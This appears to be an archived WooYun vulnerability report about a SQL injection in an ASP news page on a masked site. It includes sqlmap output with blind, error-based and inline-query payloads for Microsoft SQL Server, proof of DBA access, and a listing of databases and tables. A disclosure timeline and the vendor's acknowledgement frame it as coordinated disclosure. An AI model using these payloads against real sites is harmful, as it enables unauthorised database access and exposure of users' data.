乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
目标站点:http://**.**.**.**注入点:http://**.**.**.**/e-go/news_detail.asp?CateID=1&NewsID=29156
sqlmap identified the following injection point(s) with a total of 129 HTTP(s) requests:---Parameter: CateID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: CateID=1 AND 2142=2142&NewsID=29027 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: CateID=1 AND 2680=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2680=2680) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)))&NewsID=29027 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: CateID=(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1702=1702) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113))&NewsID=29027---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008
DBA权限,23个数据库:
current database: 'E5912429_ego'current user is DBA: Trueavailable databases [22]:[*] BCST[*] E5912429_ego[*] E5912429_pain[*] FourSeason[*] KD[*] LD[*] liposome[*] master[*] model[*] msdb[*] ntusm[*] Oral99[*] PenMen[*] People[*] PeopleMove[*] PeopleMove2013[*] PPAT2010[*] Register[*] screening[*] screening99[*] tempdb[*] vhost64494
数据库比较多,就看看当前数据库吧
Database: E5912429_ego+----------------------+---------+| Table | Entries |+----------------------+---------+| dbo.tb_news | 29137 || dbo.tb_newsBackup | 12202 || dbo.tb_uploadfile | 2997 || dbo.tb_youthDB | 2819 || dbo.tb_registration | 1324 || dbo.tb_match_youth | 718 || dbo.tb_match | 417 || dbo.tb_request | 365 || dbo.tb_symposium | 138 || dbo.tb_feedback | 68 || dbo.tb_heart | 24 || dbo.tb_ads | 20 || dbo.tb_admin | 13 || dbo.tb_radio | 10 || dbo.tb_youth | 9 || dbo.tb_doc | 6 || dbo.tb_email | 5 || dbo.tb_welcome | 3 || dbo.tb_activity | 2 || dbo.tb_activity_cate | 2 || dbo.tb_image | 2 || dbo.tb_pagedown | 1 |+----------------------+---------+
危害等级:高
漏洞Rank:16
确认时间:2016-01-14 03:48
感謝通報
暂无